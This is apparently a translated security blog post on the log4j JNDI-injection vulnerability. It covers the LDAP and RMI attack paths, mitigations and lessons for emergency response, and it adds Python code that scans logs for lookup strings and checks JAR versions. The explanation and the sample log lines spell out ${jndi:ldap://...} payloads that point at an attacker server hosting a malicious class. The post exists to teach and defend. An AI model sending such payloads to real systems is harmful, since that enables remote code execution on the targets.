Information security - Epic-level vulnerability log4j: vulnerability mechanism and preventive measures
2022-07-06 15:46:00 【Empty one by one】
Recently, R&D colleagues must have been tormented by the log4j vulnerability: fixing it at 2 a.m., one patch after another. No sooner had one version been patched than the 2.15 and 2.16 releases were bypassed in turn, pushing the fix up to version 2.17. Exhausting, exhausting, exhausting.
Having lived through it, we ought to understand what the log4j vulnerability is, how it is exploited, and what the consequences are.
log4j has two vulnerability mechanisms; without further ado, the diagram (not reproduced here):
1. Use log4j to trigger an LDAP lookup and exploit the LDAP lookup mechanism: the attack path via LDAP
2. Use log4j to trigger RMI: the attack path via RMI
Normally we write a log line such as logger.info("this is a log content"); and the text this is a log content is written to the log file.
However, log4j treats certain strings specially. Take logger.info("${jndi:ldap://172.20.0.188:1099/evil}"); as an example: log4j2 parses the string it is about to output, finds ${ in it, handles that part separately, and recognises it as JNDI lookup content.
It then parses the JNDI part further and finds the LDAP protocol, the LDAP server 172.20.0.188:1099 and the key to look up, evil, and calls the LDAP client to request the corresponding data. Here is the problem: JNDI supports a mechanism called naming references, which means JNDI can download a class file from a remote location and construct an object from it! Downloading a class, loading it and building an object from it is an astonishingly heavy-handed operation.
If the remote URL points to an attacker's server (http://172.20.0.188:80/excute.class) and the downloaded class file contains malicious code, it is already too late: any consequence is possible. This is JNDI injection.
Protection and solution
1. Check the code and upgrade to a safe version promptly. This vulnerability also affects many Apache open-source projects, which should be updated as well; use the latest version, 2.17.0.
2. Malicious traffic may contain jndi:ldap:// or jndi:rmi://; IDS and WAF rules can be written to pick the attack traffic out of the stream;
3. Add the JVM startup parameter -Dlog4j2.formatMsgNoLookups=true
4. Set log4j2.formatMsgNoLookups=true in the log4j2 properties file (log4j2.component.properties)
5. Set the environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
6. Shut off unnecessary outbound internet requests;
7. Disable the lookup feature or the JNDI service;
8. Upgrade the JDK to the latest version;
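As an added example (not code from the original post), here is a small Python scanner for the pattern item 2 describes: it finds ${jndi:...} lookup strings in captured log or request lines and extracts the scheme, server and key, so a defender can hunt for them and feed the callback endpoints into blocking rules. The sample log lines are constructed here; the 172.20.0.188:1099/evil endpoint is the one used in the post.

```python
import re
from urllib.parse import urlsplit

# A log4j lookup as described above: ${jndi:<scheme>://<server>[:port]/<key>}.
# The prefix is matched case-insensitively (log4j lowercases lookup prefixes);
# the scheme is captured so that both the LDAP and the RMI paths are covered.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:(?P<uri>[a-zA-Z]+://[^}\s]+)\}", re.IGNORECASE)

def find_jndi_lookups(line):
    """Return (scheme, server, port, key) for every JNDI lookup string in a line."""
    hits = []
    for match in JNDI_LOOKUP.finditer(line):
        parts = urlsplit(match.group("uri"))
        hits.append((parts.scheme.lower(), parts.hostname, parts.port, parts.path.lstrip("/")))
    return hits

def scan_lines(lines):
    """Scan an iterable of log lines; yield (line_number, hit) for each lookup found."""
    for number, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            yield number, hit

def callback_servers(lines):
    """Distinct host:port endpoints referenced by lookups, for block-list or IoC triage."""
    servers = set()
    for _, (_, host, port, _) in scan_lines(lines):
        servers.add(f"{host}:{port}" if port else host)
    return sorted(servers)

# Constructed sample access-log lines (not real traffic). The first two carry the
# LDAP and RMI forms from the post in the User-Agent field; the last one is benign.
SAMPLE_LOG = [
    '10.1.2.3 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://172.20.0.188:1099/evil}"',
    '10.1.2.4 - - "GET /api HTTP/1.1" 200 "${jndi:rmi://172.20.0.188:1099/evil}"',
    '10.1.2.5 - - "GET /index HTTP/1.1" 200 "Mozilla/5.0 this is a log content"',
]

if __name__ == "__main__":
    for number, (scheme, host, port, key) in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {scheme} lookup -> {host}:{port} key={key}")
    print("callback servers:", callback_servers(SAMPLE_LOG))
```

This only matches the plain form shown in the post and is a retro-hunting aid, not a substitute for upgrading.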
Reflections on building emergency response capability, prompted by the log4j vulnerability
1. Standards for introducing open-source components: consider unifying log4j and other open-source components so that only a few common versions need to be introduced; after a security review they are stored in the company's private Maven repository for R&D use, and other unverified versions may not be introduced. If a version needs to be added to the private repository, it should go through approval and security verification before entering the Maven repository;
2. Development model: all component packages are managed through Java dependency management, with component dependencies imported via a hierarchical (parent) POM. Each component upgrade then only requires upgrading the top-level POM; other programs that use the component simply recompile and pull the latest package to complete the upgrade, with no need to change their own POM;
3. CI/CD deployment platform: the deployment and startup of every program must be controllable and responsive from the platform side. For example, the shell startup scripts of Java programs must be platformised on the CI/CD deployment platform, so that the platform can uniformly modify the startup command and perform the restart, giving the platform rapid-response capability;
4. Asset platform: it must be clear which applications are exposed to the internet, which open-source components those applications use, and which version of each component they use. Through the asset platform the risk status of existing applications can be located quickly;
5. Code detection platform: periodically match the vulnerable versions of open-source components listed in CVEs against the versions in use, generate alerts and trigger the alert handling process;
6. From a zero-trust perspective, a zero-trust platform can also play a role in the log4j vulnerability: with a model of zero trust that only trusts a whitelist, every call from the company intranet to an external interface must be registered on the zero-trust platform, and any untrusted call chain that is found triggers an alert immediately;
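As an added example (not from the original post or from the log4j project), here is a Python check of the kind items 1 and 5 call for: it opens a JAR, reads the log4j-core version from its Maven pom.properties, checks whether the JndiLookup class is present, and flags the artifact when the version is below the 2.17.0 the post names as safe. The sample JARs are built in memory here; the Maven metadata path and class name are those of the real log4j-core artifact.

```python
import io
import re
import zipfile

# Paths inside a real log4j-core JAR: the Maven metadata that carries the version,
# and the class implementing the ${jndi:...} lookup described in the post.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
SAFE_VERSION = (2, 17, 0)  # the version the post recommends upgrading to

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a missing patch level counts as 0, suffixes are ignored."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)

def inspect_jar(jar_bytes):
    """Report the embedded log4j-core version, whether JndiLookup is present, and a verdict."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                key, _, value = line.partition("=")
                if key.strip() == "version":
                    version = value.strip()
        has_lookup = JNDI_LOOKUP_CLASS in names
    # Conservative verdict: a JndiLookup class with no readable version is treated as vulnerable.
    vulnerable = has_lookup and (version is None or parse_version(version) < SAFE_VERSION)
    return {"version": version, "jndi_lookup": has_lookup, "vulnerable": vulnerable}

def build_sample_jar(version, with_jndi_lookup):
    """Constructed stand-in for a log4j-core JAR (Maven metadata plus an empty class entry)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as jar:
        jar.writestr(POM_PROPERTIES,
                     f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")
    return buffer.getvalue()

if __name__ == "__main__":
    for version, lookup in (("2.14.1", True), ("2.17.0", True), ("2.14.1", False)):
        print(version, inspect_jar(build_sample_jar(version, lookup)))
```

Nested JARs inside fat or shaded archives and relocated package names are not handled; a missing pom.properties alongside a present JndiLookup class is reported as vulnerable on purpose.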